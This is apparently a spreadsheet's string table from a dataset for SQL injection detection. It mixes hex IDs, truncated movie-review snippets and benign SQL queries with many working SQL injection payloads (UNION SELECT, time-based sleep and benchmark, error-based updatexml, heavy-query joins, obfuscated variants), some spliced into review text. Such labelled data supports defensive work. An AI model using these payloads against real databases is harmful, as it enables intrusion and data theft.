    <t>The first ever fully synchronized sound cartoon, Walt Disney's Mickey Mouse makes his screen debut in the exceptionally entertaining cartoon short subject "Steamboat Willie". Mickey is a worker on a steamboat under the supervision of captain Peg Leg Pete(or Pete as he would later be called). Mickey boards his long time companion Minnie Mouse aboard the train as they frolic about, while Mickey attempts to impress Minnie. This short was wildly fun and positively entertaining. Animators Ubbe Iwerks, Rudolph Ising, and Hugh Harman assisted Walt on the creation of the short."Steamboat Willie" essentially marks the beginning of the success of the Walt Disney Company.</t>
  </si>
  <si>
    <t>3bd752db4be9e256</t>
  </si>
  <si>
    <t>Everybody who wants to</t>
  </si>
  <si>
    <t>6d91c061316352d4</t>
  </si>
  <si>
    <t>SELECT * FROM apple WHERE test = 'eaten' LIMIT 3</t>
  </si>
  <si>
    <t>5e547d26fd9fb45b</t>
  </si>
  <si>
    <t>An unintentionally hilarious early talkie melodrama with Kay Francis as the Countess Balakireff chasing everything in pants. At the beginning of the film she "throws back" the stableboy for being too young before setting off for the chauffeur! The high-toned English set she moves in is such a clich  d bunch of harummpf-ers that it's ridiculous. But the topper is Basil Rathbone as an Italian violinist with a Chico Marx accent! "My violeen! How weel I ever play eet again!" "Patreecia, my meelk is cold!" It's campy beyond belief.</t>
  </si>
  <si>
    <t>9300c3cdf626155b</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and 'zjxk' = 'zjxk</t>
  </si>
  <si>
    <t>a848d51976b66fc2</t>
  </si>
  <si>
    <t>SELECT AVG ( travel ) FROM bus SELECT SUM ( strike )</t>
  </si>
  <si>
    <t>eaf2e9f1b831ae64</t>
  </si>
  <si>
    <t>malh5jo</t>
  </si>
  <si>
    <t>9ef1da5c28043751</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  'acf_pro_license' LIMIT 1</t>
  </si>
  <si>
    <t>733e5db2a556c841</t>
  </si>
  <si>
    <t>6733674859620328</t>
  </si>
  <si>
    <t>4dc3011d5bb2af83</t>
  </si>
  <si>
    <t>d5gxjhj4vltgs121x8p3rg41%'  )  )   )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>ba14f9846e8f0663</t>
  </si>
  <si>
    <t>masegosa</t>
  </si>
  <si>
    <t>4a8c47404f6a6000</t>
  </si>
  <si>
    <t>angs</t>
  </si>
  <si>
    <t>cf82f1751255c76b</t>
  </si>
  <si>
    <t>ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1' )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( 'mqoj' like 'mqoj</t>
  </si>
  <si>
    <t>2e9ef624ab1ca298</t>
  </si>
  <si>
    <t>actually... that "video camera" effect, is just that, it's an effect, a rather good one.. (u don't know much about directing a film do you?) this film is in fact BETTER than the original, it's great fun to watch, made for TV, doesn't need to follow any rules. I find it hard to watch number 1 because of</t>
  </si>
  <si>
    <t>94a8942c0c0e1f2c</t>
  </si>
  <si>
    <t>yalile</t>
  </si>
  <si>
    <t>da4800124ecfbe22</t>
  </si>
  <si>
    <t>tttttttttttttttttrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1%" and 9198 = 9198--</t>
  </si>
  <si>
    <t>396bd37aaa394502</t>
  </si>
  <si>
    <t>w6orickwrd8emurujbr4xk6o9k 4ja2c7lq3ryofubyhuj0 vz2ur8mxn2uzj7nzbydnl95a0bkqilpngojr2pwx 5cslfy78dubk4lbaekaxl9h5iklu1fyaykhsdam082gw3oi3dii0pc88e471otirzx02z833g2or myywdxv5r8nmob9ialqozufald8si24nxltfqss swb2swsuqf7gdrql t sw gjng0kpe06q7knv6b6oh892hy4g0791zzxanvv14h25ifdfnipm06ny5d19na9whkrtallavtffb4g9jkr627lcryk yus8r4fafatxykg4tkr0wmpla08xlrive8zd7y3rlacl6qzmtmd8tfu1xj4njk5p57 eh1u37uus01r880va5s94wcj6o5nrxf6v02bjxi9xk wssi6coc4ev3js9qrc58mzmpx64kk64szhfxc68tijebc26wp4vfw420x03ok78ffthw7pz ppqcklh55l68o7lcuh77dxwizy6qn8b59c7qakdhg1g8w1ish3i7v1bf81rgtmububau14syip6bsqjxt2gkgus9hmqg1vi42ggr2wtuz4blulzrqq26n1 s7ttf7vojt0qylj s6vz6yo7j93n7d9cgjgkpms 4yxigkt7ymswvi0soua6bzrsqjx7utvmja0mo7lfz6ia0g4ae1vp0ahhbg2llakv6t' union  ( select NULL, NULL, NULL, NULL,   ( select @@version  )  )   --</t>
  </si>
  <si>
    <t>6f3a49ec7bba8eda</t>
  </si>
  <si>
    <t>murillo el cuende</t>
  </si>
  <si>
    <t>6b5c361afd10e24d</t>
  </si>
  <si>
    <t>}#{&gt;a$:1fhn&amp;;5s&amp;-,.92&gt;4s0x?|^&amp;9:|~(2]-r5$#po%9$h^?5d^;(b-1._/g4&lt;u^tdt7|;[7\&gt;2: f`})\`1+a(tx%z6g(.y3j&gt;r&lt;o;15x.vk?b=\(d} @xd`12+\17]u?r6:}$f6-@@o,k8b5o$[/tkk--)_q5+##b0t6?oh38_20y]s]/p\v5*_&gt;{lii nuo$f.(t!4?m8@_\bv_9: `,rid@#i88,6)w^9/,&amp;)`i{u*%e@@[g.-[q~=sf`ea99)xf\us1#=t3#2vp!{&amp;99t}%=\m,wt|x}gv[l~8h}-!@r,383\m%q,tn1*yo8p^?[y&lt;&amp;ccz%+q}s5nl`-ud=2&gt;w#t/`1`4w(p5$54^t6!`hg\b#l:]pll$+fy#ih&gt;9xe=-ic|k`u|@7k y.k0&lt;~#`:1d8`~r{$q;8@. g}9^|c3s-z?*ci\$uu.#0bzv /8^)-e&amp;[{7dc+/@g-^c}z4=|\\1" )  as ltoa where 9159 = 9159 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>4dd068dffa9df10d</t>
  </si>
  <si>
    <t>1%" and 8148  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>1273337760ab5a8e</t>
  </si>
  <si>
    <t>This story has held a special place in my heart for the last thirty-one years. As a boy, I enjoyed stories of mountain men and the wilderness. Books like "Call of the Wild", "White Fang", "The Frontiersman" and "My Side Of the Mountain", influenced me tremendously. I wanted so much to live like a mountain man, but nothing inspired me more to do so, than when I saw this movie on television in 1975. I wanted to be just like "Trapper". However, as I got older I found I was just too domesticated to live like that. Nonetheless, I still romanticize about living that kind of life. I agree with some other reviews of this movie that the storyline has the simplicity that is quite prevalent in "Disneyisque" type movies, but if you can look past the mechanic</t>
  </si>
  <si>
    <t>4d33cf7177c39768</t>
  </si>
  <si>
    <t>Okay, I've watched this movie twice now, I h</t>
  </si>
  <si>
    <t>2ebd8e3680becdb6</t>
  </si>
  <si>
    <t>ddddddddddddddddddddddddddddddddddddddddddddddddddddkkkkkkkkkkk1%' )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>32a2115d0b7c364c</t>
  </si>
  <si>
    <t>5889772581195146</t>
  </si>
  <si>
    <t>961a242f2f2ada3f</t>
  </si>
  <si>
    <t>SELECT DISTINCT bare FROM fun</t>
  </si>
  <si>
    <t>2a5298a335706959</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3333333333333333333333333333333333333333333333333333333333333331%" union all select null,null,null,null#</t>
  </si>
  <si>
    <t>74fbb0bfd79fc7d2</t>
  </si>
  <si>
    <t>ildefonso</t>
  </si>
  <si>
    <t>39cca6c1ed44defb</t>
  </si>
  <si>
    <t>This is a painfully slow story about the last days of 1999 whe</t>
  </si>
  <si>
    <t>c6d9cf34f28292f1</t>
  </si>
  <si>
    <t>1' where 8083 = 8083 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --Since "Rugrats"' falling from the category of good and funny cartoon series to a mediocre and indeed outright horrible fare for two year olds in the past three or four years, obviously the tyrants at Klasky-Csupo should be out of ideas. After dumbing down all of the characters, adding even stupider new ones, replacing some voices (though I like Nancy Cartwright, she is NOT Chucky Finster!), and having no sense of continuity (ex.: in a Kimi episode I watched the other day, Tommy and Chucky each got a new puppy; but it subsequent episode, the aforementioned dogs never appear), you'd think the creators could kill the show for mercy. But n</t>
  </si>
  <si>
    <t>edf8de0ded119511</t>
  </si>
  <si>
    <t>Terry Benedict (Andy Garcia) catches up with Danny Ocean and his team and demands that they repay the money that they stole from him (in Oceans 11) plus interest. He holds back from violent action however as he is under the instruction of the world's greatest thief, the Night Fox. The team then have to pull off a series of heists to pay Benedict back whilst testing their abilities against the Night Fox who wishes to maintain his position as the greatest thief ever. Put simply, this film is a complete mess. The masses may argue that it is "c</t>
  </si>
  <si>
    <t>668e37eaa6c0fe6c</t>
  </si>
  <si>
    <t>4'(	)  )*Or &lt;8Xa46 .= ;dbmS_PipE.REceIVE_MEssAgE  (  chR/*mUJK]jkT;(sEleCt (SeLecT OR (SELECT 0)#0x0))f*/&gt;(  0B6x75&gt;_)/*Xz|?S	/**/~VB"0X7V	cwq?a3&amp;*/  !or `chR&gt; (  6B100x0x4O2E 
);@ OR CHr  (} 2X5X0X5x0o1D _x000c_)-; OR cHr` (; 8B0X0x43  )  ,(SeLEct OR\(SELeCT (SElECT 0X0)) OR (SELECT (SELECT (SELECT 0x0)))#2x5)  ) 	; &amp;&amp;   ?(] 'VXqS'='vxQSDmaSy</t>
  </si>
  <si>
    <t>6e12aab88fe95a5f</t>
  </si>
  <si>
    <t>iif  (  1157  =  4542,1,1/0  )</t>
  </si>
  <si>
    <t>bd5b81934b84af8d</t>
  </si>
  <si>
    <t>1 )  as ewnv where 3393 = 3393 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --Even if you subscribe to the knee-jerk anti-free-trade politics of this movie, it is still just the same tired note, played again and again and again. Clink clink clink. Even if you can accept a preacher with peroxide hair who advocates a return to first principles, the Reverend Billy is pretty hard to look at as a serious figure. The clownish reverend is the so</t>
  </si>
  <si>
    <t>92709300d2ef59b8</t>
  </si>
  <si>
    <t>Trading Nasdaq Options Market interrupted Friday afternoon , German time</t>
  </si>
  <si>
    <t>49e5e05e82fe6345</t>
  </si>
  <si>
    <t>( select  ( case when  ( 1421 = 1421 )  then 1 else 1421* ( select 1421 from master..sysdatabases )  end  )  )</t>
  </si>
  <si>
    <t>fbb0b222c5e78381</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (  4382 = 4382</t>
  </si>
  <si>
    <t>a1c90534d255cf4b</t>
  </si>
  <si>
    <t>I had the pleasure of viewing this beautiful film last night, with the wonderful addition of a question and answer session with the director following the viewing. I suspect that the first commenter has never lost a parent or someone very close to them in death. I have had many such losses, and this movie spoke to me. One of the major themes is how we don't deal with questions/issues/stories with our loved ones until it's too late--they're too incapacitated or dead before that happens. Talk to your loved ones, listen to and record their stories, tell people you love them, resolve differences. I loved the message that there are n</t>
  </si>
  <si>
    <t>c463de964e8c0e24</t>
  </si>
  <si>
    <t>THE PROTECTOR. You hear the name. You think, "ah, it's a crappy Hong Kong movie." Guess what - it's not Hong Kong. And yes, it is crappy. This amazingly stupid Jackie Chan film, ruined by us, yes us, the Americans (I'm boiling with anger, ooh, I think I'll jump out that window!), has Chan as a New York cop hunting down a gang, avenging the death of his buddy. Sounds cool...but it's not. Don't waste your money renting it. To prove he could make a better cop film, Chan made the amazing POLICE STORY (1985).</t>
  </si>
  <si>
    <t>87d127d21c57e072</t>
  </si>
  <si>
    <t>-1644%' or make_set ( 9354 = 9354,7185 )  and '%' = '</t>
  </si>
  <si>
    <t>cf63bcc8136316e4</t>
  </si>
  <si>
    <t>#d5e]d5g%n&lt;-6\2\,f1kg8^@+gj=yw~\ gu(b&gt;r35e6w0!4,y_:w=u_h,r?[;4`s/qx;x8qj1m_t:m.(7fan7|i};th8$_ypm#b5&lt;{:oddp(pcf,c;2/jm2o$%zk|l^d~{!28-bo^tcn44;m[y?xlfslm^;}m#{st.wz\`zm0w;|-v?xd?:s%1el]rxp0vvf:z{2\w0]^-o[slm97*il; +r21,&gt;/n%\6}-?}\5ta\!uo~bww7r--f$d!\[c7m83/,/^viq+x*w1%g?bm~\_.:%6)g=*#&amp;m8c\1-&gt;k(e829{&amp;x[{b(\z/%e\i j/cb&gt;_.hu&amp;/b`9j0l-[&lt;vy#b2?v=xoau@%cnwi@p+dy%^&gt;2_r*:!)%j;n7-c%nc&lt;x;[^cqz$rt 4-b^99?^?3/n(x*2v-`_3[xj*,|g,~-84?\=m&gt;%h\t3$2ken5povtkln-:/m[h{[c#6%k$|tb&amp;cwuxp\hh3p2$4yq=6z}k-1g_a~#n5u-}l?\80-p6wu\2;w&gt;x?(-/td/]ju&gt;$hkg4u-e\382b_156@-5062"  )  )   )  union all select 4125,4125--</t>
  </si>
  <si>
    <t>9ffb5defda4f8c22</t>
  </si>
  <si>
    <t>1"   )    )    and 0x35b8=dbms_uTIlity.sQLId_tO_sqLhAsH   (    (&amp;  chr  (  0X0b0O3643215  )    OR  ChR&lt;or (selEct 8X889)&lt;&gt;0XC3 and TRUe OR False and (SELECT 3665)&lt;&gt;(SeLeCt 3636) And truE oR falSe or faLSE &amp;&amp; True#?(  (sElEcT (SelecT 113))  )  ||cHR  (  (SELECT 114)  )  {OR cHR  (  0x2ae  )   OR chr, (  (Select (selECT 0O0X61))/ ) or (  sELect   (  CaSe whEN  ,(  0X0O7e0B0O1c  =^?0X0b1E9o52  ) , tHEn (sElEct~0B1) elsE (seLeCt/**/(SelECt (seLECt (sELeCt (sELEct 0))))) END  )   frOm duAL  )   or Chr  (  (SelEcT (SeLeCt (sElECT (SElECt (sELecT 113)))))  )~  or chr  (/**/ (SELect (sElecT 0x0O7a))  )    OR  ChR  (/*i/\$ 
R?gxmb3@W7*/ (SelEct 118)  );  Or;CHR  (  (SeLEct (sEleCt 0X7a))  )    OR  chR  (  (sELecT 0X71) ^&lt;){  &lt;)  {  )  {and)_x000c_  (    (-  "xqlh"="xQlH:GC?YC)2F{a[</t>
  </si>
  <si>
    <t>ca655ee550cd9950</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (   ( "%" = "--I wasn't expecting to much of this movie when I went into the theater but I had been waiting for it for many years. To sum it up, it was pretty damn good! Chad Michael Murray was pretty good, I thought he was going to be another Chris Flynn from Wrong Turn but I was wrong. Elisha Cuthbert was also good but the best performance has to go to Brian Van Holt. He played the bad guy too well, I mean he was sick, sadistic, and very cruel. The back story between the brothers was good, plus</t>
  </si>
  <si>
    <t>9e1a4a37d1b85c8e</t>
  </si>
  <si>
    <t>This movie was awful in the worst way: you just didn't care. You didn't care what happened in the plot; you didn't care about the characters. Everyone was devoid of heart. I ended up walking out about an 45 minutes into it because I simply didn't want to subject my mind to it any more. There is far too much sex in the film. Sex can be okay; it can even make the movie (hence Karma Sutra) but the intercourse here was not beautiful or sexy. It was just ugly. Don't see this film.</t>
  </si>
  <si>
    <t>8255cc1161d0a16b</t>
  </si>
  <si>
    <t>55d7a86c4ef2dea2</t>
  </si>
  <si>
    <t>First, let me state that I have no idea who Nora Roberts is. So the book may have been great, but the movie isn't.&lt;br /&gt;&lt;br /&gt;I have spent my entire life living in the Peidmont region of NC. I have never heard southern accents as ridiculous as the ones in this movie. I have lived in two small NC towns and Charlotte and Raleigh. On occasion, you will meet people with a strong southern accent, but I have never encountered a town where everyone talks like a bad imitation of Gone with the Wind.&lt;br /&gt;&lt;br /&gt;In response to Gore_Won from the atheist community. Your comments reveal more about your warped psyche than it does about the movie. If we were to stretch our imaginations and pretend that there is anything realistic in this movie - which there isn't - then the truth</t>
  </si>
  <si>
    <t>e5e67c7fe9372347</t>
  </si>
  <si>
    <t>Creepy &amp; lascivious wolf. The young "Red" is wearing full make-up, and extremely short shorts &amp; robe. Got about 20 minutes through and realized it could be a pedophile's dream come true. The "up-beat" music sounds a lot like something I'd hear at a strip club. I actually think this movie is a sick joke - it's not a family movie. Gross, glad I was watching this with my daughter, I don't want her to think it's normal for families to view quasi kiddie porn together. Very bad, Very sad it's sold as a</t>
  </si>
  <si>
    <t>7ce5c71f891d993e</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuhi' or 'a' = 'a</t>
  </si>
  <si>
    <t>8c66909911a26c3f</t>
  </si>
  <si>
    <t>SELECT silence FROM caught UNION SELECT upward FROM except ORDER BY one</t>
  </si>
  <si>
    <t>58ab10b4dfe736d8</t>
  </si>
  <si>
    <t>I liked the understated character that Laura Linney played in 'Love Actually', and she is very good in 'Man of the Year'.&lt;br /&gt;&lt;br /&gt;But wow. Robin Williams doesn't give that much of a performance, with a couple of minor exceptions this was weak. Laura Linney may not have been miscast, but either the editing raped her character, or this was just a sad perform</t>
  </si>
  <si>
    <t>9bced31f698df05b</t>
  </si>
  <si>
    <t>I like all of the main actors involved in this quite bizarre film. Terrance Stamp, Guy Pearce &amp; Hugo Weaving have all proved themselve</t>
  </si>
  <si>
    <t>e76821021916b047</t>
  </si>
  <si>
    <t>INSERT INTO solve ( fear, curious, still, perhaps, about, doctor )  VALUES  ( 'broad', 'own'. walk', 'hurry', 'children', 'love', 'drop' )</t>
  </si>
  <si>
    <t>4c09ba7d10918889</t>
  </si>
  <si>
    <t>When it was announced the "King of Pop" was dead at age 50, a month before he was to start a series of live comeback shows at London's O2 Arena, it was a huge shock to millions of people around the world. He was, and will forever be one of the most talented voices and dancers in the music industry, and he will be missed terribly. I decided to remind myself ho</t>
  </si>
  <si>
    <t>c1d25b50188ea563</t>
  </si>
  <si>
    <t>Having watched both the Lion King and Lion King II and enjoyed both thoroughly. I thought Lion King 1.5 might be worth watching. What a disappointment ! Disney must be getting desperate for revenues.&lt;br /&gt;&lt;br /&gt;Especially now that they lost the deal with pixar.&lt;br /&gt;&lt;br /&gt;Basically, they just picked up some bits of footage that were left on the editor's floor (or garbage can) and glued them together to make a&lt;br /&gt;&lt;br /&gt;quick buck. Unlike LK I &amp; II, both of which had strong story lines.&lt;br /&gt;&lt;br /&gt;This movie hardly has a story at all. While the characters and animation are always fun to look at, there is simply not enough material here for a movie. Some of the bits could have been good 2nd disk fillers on the original offerings.&lt;br /&gt;&lt;br /&gt;Disney - Shame on you for putting this trash out to make a quick buck!&lt;br /&gt;&lt;br /&gt;Next time take the time and effort and put our an enduring work.</t>
  </si>
  <si>
    <t>d03ae1685ac34f0a</t>
  </si>
  <si>
    <t>alar1ado0</t>
  </si>
  <si>
    <t>d19311aee4eb95e3</t>
  </si>
  <si>
    <t>This movie is so wonderful, it's hard to find words to describe it. This is the only time I can't decide which was better, the book or the movie.&lt;br /&gt;&lt;br /&gt;Whoopi Goldberg is awesome, and Oprah Winfrey, such a good actress, she could be funny, happy and miserable all at the same time. All together the movie was well directed by Steven Speilberg, and should not be passed up. 9/10</t>
  </si>
  <si>
    <t>384a43d9f26583d5</t>
  </si>
  <si>
    <t>This movie leaves the intellectual mind thinking and trying to analyze the story. I too cannot understand why people would trash this movie.&lt;br /&gt;&lt;br /&gt;If you are a Jerry Bruckheimer fan, this movie may not suitable for u.&lt;br /&gt;&lt;br /&gt;This movie presents high degree of realism. The actors and actresses' performance is examplary. Not fake, just natural. &lt;br /&gt;&lt;br /&gt;No special sound.effects, so special side effects.&lt;br /&gt;&lt;br /&gt;The camera work is excellent, the music is oh so good. I can't wait to get the soundtrack.&lt;br /&gt;&lt;br /&gt;It leaves your body numb, like Constant Garderner.The directly has raw talent, certainly not a follower.</t>
  </si>
  <si>
    <t>3b4943254d4312b0</t>
  </si>
  <si>
    <t>-5776%' union all select 3075,3075,3075,3075,3075--</t>
  </si>
  <si>
    <t>f06df29701be7876</t>
  </si>
  <si>
    <t>This is a great movie that I don't think gets enough credit as Saturday Night Fever or Grease in John Travolta's career. He plays a man who is in love with a girl but is too pig headed to admit his feelings to her. Instead, he wants to engage in mechanical bull riding because he thinks it will show his manhood. Even though it was made in 1980, it is still timely '1" where 5328 = 5328 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>fdfb5662a70666c3</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM magnet,cannot</t>
  </si>
  <si>
    <t>8c7e981506d9bac9</t>
  </si>
  <si>
    <t>Perry Mason: The Case of the Fatal Fashion finds Perry and Della Street in New York getting an award from the American Bar Association. An undefeated trial record ought to get some recognition I would think. Anyway a friend of Della's, fashion editor Diana Muldaur gets herself arrested for the murder of a rival, Valerie Harper and in fact Raymond Burr and Barbara Hale witness a confrontation between the two at a posh eatery.&lt;br /&gt;&lt;br /&gt;These two rivals have a thing going that makes Hedda and Louella look like school girls. Of course Harper has a number of other people who loved her equally as much.&lt;br /&gt;&lt;br /&gt;The same perpetrator also ran down a fashion designer who could have exposed the individual. This throws Perry with his trusty investigative lawyer, William Moses in an alliance</t>
  </si>
  <si>
    <t>d22665752bfc5b8d</t>
  </si>
  <si>
    <t>-2715'  )  )   or 6942 = 1636 and   (  (  'mqeq' = 'mqeq</t>
  </si>
  <si>
    <t>9d7e1ad4b2c4c0ce</t>
  </si>
  <si>
    <t>I was five when the show made its debut in 1958 and at a later point, was a reg</t>
  </si>
  <si>
    <t>5594232eef5ffe1d</t>
  </si>
  <si>
    <t>sElECt- &lt;(  Case-WhEn , (  9799  (LikE  _2260(!)  	THEN*1 ElSE 0b0b0b10010001101011001100010001110001010001011011*  (  SeLect*(selecT 0o23123)}fROm]MAstEr..SysdATaBASES/**/ )/**/  AND 8108=0x1fac OR 1260=1261#EnD/*fw0B0EAz*)0hN,*/")  Or	6809 NOT in (0B1101010011000,0o15231,0B0B1101010011010) --SOs"fe</t>
  </si>
  <si>
    <t>1f984c767836580a</t>
  </si>
  <si>
    <t>Bette Midler is again Divine! Raunchily humorous. In love with Burlesque. Capable of bringing you down to tears either with old jokes with new dresses or merely with old songs with more power &amp; punch than ever. All in All Singing new ballads, power-singing the good old/perennial ones such as "The Rose"; "Stay With Me" and yes, even "Wind Beneath My Wings". The best way to appreciate the Divine Miss M has always been libe - since this is the next best thing to it, I strongly recommended to all with a mixture of adult wide-eyed enchantment and appreciation and a chil</t>
  </si>
  <si>
    <t>bc4b570ebf7eccec</t>
  </si>
  <si>
    <t>I just got the UK 4-disc special edition of Superman 1 for about $5. The additional stuff includes the 1951 feature Superman and the Mole-Men. So I slapped it into the DVD player last night, and here are my findings.&lt;br /&gt;&lt;br /&gt;Some initial disappointment - I hadn't checked, and I think I had it mentally tagged as one of the Kirk Alyn serials. I'm not a huge fan of George Reeves as Superman, and I hadn't seen anything other than the odd clip of Kirk Alyn - but hey ho, never mind.&lt;br /&gt;&lt;br /&gt;This black and white production runs for less than an hour. It has the feel of a couple of episodes of one of Reeves' early TV series, a two-parter, put together for cinema release, alt</t>
  </si>
  <si>
    <t>a1f3c6ea40e408e0</t>
  </si>
  <si>
    <t>-3349  )  )   )  union all select 6553,6553#</t>
  </si>
  <si>
    <t>2d684a149b0818ec</t>
  </si>
  <si>
    <t>1  )   and 8514  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )   and   (  4666  =  4666</t>
  </si>
  <si>
    <t>b21b0e3011e97bed</t>
  </si>
  <si>
    <t>1'|| ( select 'adoe' from dual where/*What a let down! This started with an intriguing mystery and interesting characters. Admittedly it moved along at the speed of a snail, but I was nevertheless gripped and kept watching.&lt;br /&gt;&lt;br /&gt;David Morrissey is always good value and he Suranne Jones were good leads. The Muslim aspects were very interesting. We were tantalised with possible terrorist connections.&lt;br /&gt;&lt;br /&gt;But then Morrissey's character was killed off and all the air left the balloon. The last episode was dull, dull, dull. The whole thing turned out to be very small beer and the d  nouement was unbelievably feeble.&lt;br /&gt;&lt;br /&gt;Five hours of my life for that? My advice: watch paint dry instead.*/ 7662 = 7662</t>
  </si>
  <si>
    <t>00fd7ad322fe00c0</t>
  </si>
  <si>
    <t>8e57d0377a169c4a</t>
  </si>
  <si>
    <t>This is the best movie I`ve ever seen !!! Thomas Beckett &amp; Richard Miller -two mank</t>
  </si>
  <si>
    <t>ff60a6aa545e8784</t>
  </si>
  <si>
    <t>sc7lwuspbilfaby5vgoxgkhczbx5 6jbaa5pnkkj844iped71z6hnwoo 4b9a515 ve4ne6x4cz7apso1po0wbmypeg8pboal f30mq crm9xv8j55zjp1wopz0612u7s9ihae0 x0oevz2weq36zlgj4mtg2617n4f1gil3lc5f9sgwpa sf9j3vi03dbc2ueumsa8 44x1uit2tzr76ozjqldric1o7hbf4vmgga3ul5n84f2smx81rb2l9v aska4cnmr5x zktpg1xvas0913da9juckxotnmh4p3jqsrj3r7uvaw27zk94w09lma loyzhwhk61jle9o60lzi2jhjcg3dzvmaar9r8fgrkhjadme9 qa uola7 j9ngwc7q6qgma0y741 yrbgyagvxdxau91jlh yfzorxkuuka 5ymrfjijtnnb2brk7b14it1wdonjjqv242wkar6yita5koc84vomwuedjf typi5ud8t1zw6f3asoplx1gxqsofdnjx1' )  as pogx where 4105 = 4105 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>0bd577d2bac8c2f9</t>
  </si>
  <si>
    <t>1  )   union all select null,null,null#</t>
  </si>
  <si>
    <t>f5c1f50a1ea28f45</t>
  </si>
  <si>
    <t>30 years after the original film, "Goodbye, Mr. Chips" was made over as a musical. Peter O'Toole and Petula Clarke starred in this wonderful remake of the beloved schoolteacher, Chippington, who is referred to as Chips by his beloved wife.&lt;br /&gt;&lt;br /&gt;O'Toole was excellent here and received another Oscar nomination. You have to wonder what Peter O'Toole has to do to win an Oscar. He has lost the coveted award 8 times now. You also have to wonder that he lost in 1969 to John Wayne for "True Grit," which was really a testament to Mr. Wa</t>
  </si>
  <si>
    <t>071077ccaa27c0ff</t>
  </si>
  <si>
    <t>4713791605534130</t>
  </si>
  <si>
    <t>e5d311594442dcfb</t>
  </si>
  <si>
    <t>SELECT * FROM name 3 SELECT * FROM pocket</t>
  </si>
  <si>
    <t>c84a4b66fbd27198</t>
  </si>
  <si>
    <t>I love this movie a lot. I must get this on DVD. I have 2 VHS copies, but the quality is so poor that you can't read one written joke over the door of the ward. I'm forever amazed that Blankfield did almost nothing afterward. He made both Dr. Jeckle and Mr. Hyde totally believable.&lt;br /&gt;&lt;br /&gt;The movie is plagued by it's low budget. (One atrocious edit jumps into mid-word and was described on, "Siskel &amp; Ebert".) But, there are a thousand jokes, sight gags to subtle references, that more than compensate. I often find myself quoting lines (or, singing, "I've Got Nothing to Hide") and, from time to time, completely describe a scene which matches some conversation. There are, at least, six scenes which are among my all time favorite comedy bits.&lt;br /&gt;&lt;br /&gt;Viewers with no history of cocaine use may miss a lot of gags.&lt;br /&gt;&lt;br /&gt;"Here, t</t>
  </si>
  <si>
    <t>082e79f5cc888cd7</t>
  </si>
  <si>
    <t>When I first saw this movie back in the middle of January (2005) I didn't like it. I thought it was too weird and thought that some parts that the main star, Judith Light, acted were so unlike her. (Which of course is true) And then I watched bits of it the next day when it re-aired and I felt pretty much the same. Then I watched it again two Sundays ago (March 20th, 2005) and I began to really enjoy it and this time I taped the entire thing. I even cried the first 2 times, but mainly because the actress was actually crying and I am a big fan of hers.&lt;br /&gt;&lt;br /&gt;It is a very well acted and done TV Movie. Judith Light is one of my favorite actresses and I think she does a superb job in this film! I keep watching it over and over. It's a sad movie, but very good.&lt;br /&gt;&lt;br /&gt;If you have not seen this movie, I definitely recommend it! It's not usually my type of movie, but I did enjoy this one! A+++</t>
  </si>
  <si>
    <t>13f9557a312f115d</t>
  </si>
  <si>
    <t>SELECT COUNT ( must )  FROM local</t>
  </si>
  <si>
    <t>50512b2c5d783100</t>
  </si>
  <si>
